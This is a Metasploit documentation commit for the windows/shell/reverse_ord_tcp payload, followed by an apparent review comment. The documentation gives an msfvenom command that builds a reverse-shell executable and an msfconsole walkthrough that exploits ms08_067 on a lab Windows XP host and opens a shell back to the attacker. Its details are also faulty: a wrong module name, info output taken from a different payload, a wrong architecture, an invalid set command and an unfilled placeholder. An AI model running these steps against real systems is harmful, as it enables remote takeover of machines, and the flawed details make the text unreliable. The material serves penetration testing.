Land #10474, add documentation for windows/shell/reverse_ord_tcp
commit
d25aad571f
@ -0,0 +1,125 @@
windows/shell/reverse_ord_tmp:Windows Command Shell, Reverse Ordinal TCP Stager is an unique windows payload for Metasploit Framework.
It is really small (<100 bytes), it uses the existing ws2_32.dll in memory in connect and load the next stage of the payload.

It provides a shell on the target machine which can be used to achieve almost anything on the target pc.

## Vulnerable Application

This Meterpreter payload is suitable for the following environments:

* Windows x64

## Verification Steps

windows/shell/reverse_tcp is typically used in two different ways.

1. As a payload for an exploit:

To check its compatibility with an exploit, select the exploit in the msf console and type the ```info``` command. The output will be similar to:

```
msf5 payload(windows/shell/reverse_tcp) > info

Name: Windows Command Shell, Reverse TCP Stager
Module: payload/windows/shell/reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 283
Rank: Normal

Provided by:
spoonm <spoonm@no$email.com>
sf <stephen_fewer@harmonysecurity.com>
hdm <x@hdm.io>
skape <mmiller@hick.org>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Description:
Spawn a piped command shell (staged). Connect back to the attacker
```


If the platform field includes Windows, then windows/shell/reverse_ord_tcp can be used as the
payload.

To use at as a payload for an exploit, use the following commands:
1. In msfconsole, select an exploit module compatible with windows.
2. Configure the options for that exploit.
3. Then run the following command: ```set windows/shell/reverse_ord_tcp```
4. Set the ```LHOST``` option, to be the IP address that the payload should connect to.
5. Then run the command: ```exploit```.

If the exploit is successful, the payload will get executed.


2. As a standalone(executable)

To use it as an executable, msfvenom can be used(msfvenom replaced msfpayload and msfencode in the year //)

A typical example of doing this is as follows:


```./msfvenom -p windows/shell/reverse_ord_tcp LHOST=192.168.23.1 LPORT=4444 -f exe -o /tmp/ordpayload.exe```

## Scenarios

The following commands are run on a Windows XP SP 2 English Machine:

```
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_ord_tcp
payload => windows/shell/reverse_ord_tcp
msf exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.56.3
RHOST => 192.168.56.3
msf exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.3 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_ord_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.56.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf exploit(windows/smb/ms08_067_netapi) > exploit
```

The above commands will result into the following scenario(leading to a shell on the target machine ):

```
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.3:445 - Automatically detecting the target...
[*] 192.168.56.3:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.56.3:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.56.3:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.56.3
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.3:1034) at 2018-08-17 15:25:02 +0530
```
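Review bot: the module name in the opening line and the payload-selection step are both wrong: the first line reads `windows/shell/reverse_ord_tmp` (the module is `windows/shell/reverse_ord_tcp`), and step 3 under "As a payload for an exploit" tells the reader to run `set windows/shell/reverse_ord_tcp`, which msfconsole will not accept; it should be `set payload windows/shell/reverse_ord_tcp`, the form the Scenarios transcript already uses. The rest of the Verification Steps section documents windows/shell/reverse_tcp rather than this module: the intro sentence names reverse_tcp, and the pasted `info` output (Module: payload/windows/shell/reverse_tcp, Total size: 283) belongs to the plain stager and contradicts the "<100 bytes" claim above it; run `info` on reverse_ord_tcp and paste that output instead. "Vulnerable Application" lists only "Windows x64" and calls this "This Meterpreter payload", yet it is a command-shell stager and the info output shows Arch: x86; list the x86 Windows targets it actually supports. The opening paragraph should also spell out the prerequisite that makes this stager small: it resolves its socket calls through ws2_32.dll ordinals instead of hashing API names, so ws2_32.dll must already be loaded in the exploited process (true of the SMB service in the ms08_067 scenario); where it is not, the stager cannot find connect() and no session comes back. Smaller points: the parenthetical "msfvenom replaced msfpayload and msfencode in the year //" still has an unfilled placeholder and should be completed or dropped; in the Scenarios transcript the `use exploit/windows/smb/ms08_067_netapi` line comes after `set payload` while the prompt already shows the exploit selected, so move it to the top; the prompts mix `msf5` and `msf`; and "To use at as a payload" should read "To use it as a payload".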